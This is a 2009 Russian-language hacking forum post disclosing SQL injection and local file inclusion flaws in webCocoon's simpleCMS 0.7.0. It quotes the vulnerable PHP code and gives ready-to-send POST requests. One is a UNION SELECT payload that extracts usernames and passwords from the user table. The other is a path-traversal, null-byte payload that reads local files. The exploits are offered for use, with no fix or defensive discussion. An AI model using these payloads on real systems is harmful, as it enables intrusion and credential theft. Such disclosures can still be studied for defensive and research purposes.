20.12.2009, 17:44
|
|
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
С нами:
9428066
Репутация:
1668
|
|
webCocoon's simpleCMS Vuln's
webCocoon's simpleCMS
Web site : http://webcocoon.wordpress.com
Version : 0.7.0
SQL Injection
Vuln file: /content/post/show.php [str:3]
PHP код:
//Show post
$get_post = mysql_query("SELECT*FROM post WHERE post_id = '$id' AND status = 'published'");
$post_result = mysql_num_rows($get_post);
$post = mysql_fetch_array($get_post);
Exploit:
if magic_quotes = OFF
Код:
POST http://[host]/[path]/index.php HTTP/1.0
Content-type: application/x-www-form-urlencoded
id=xek' union select null,concat_ws(0x3a,username,password),null,null,null,null,null,null,null,null,null,null,null,null,null,null from user -- &mode=post&gfile=show
*так же уязвимы параметры: year, month, date
Local File Inclusion
Vuln file: /templates/default/template.html [str:538]
PHP код:
if($mode == ""){
include"content/front/$template.php";
}
elseif($gfile == "$gfile"){
include"content/$mode/$gfile.php";
}else{
include"content/front/$template.php";
}
Exploit:
if magic_quotes = OFF
Код:
POST http://[host]/[path]/index.php HTTP/1.0
Content-type: application/x-www-form-urlencoded
mode=../../../../../../../[local_file]%00&gfile=browse
Последний раз редактировалось RulleR; 20.12.2009 в 17:51..
|
|
|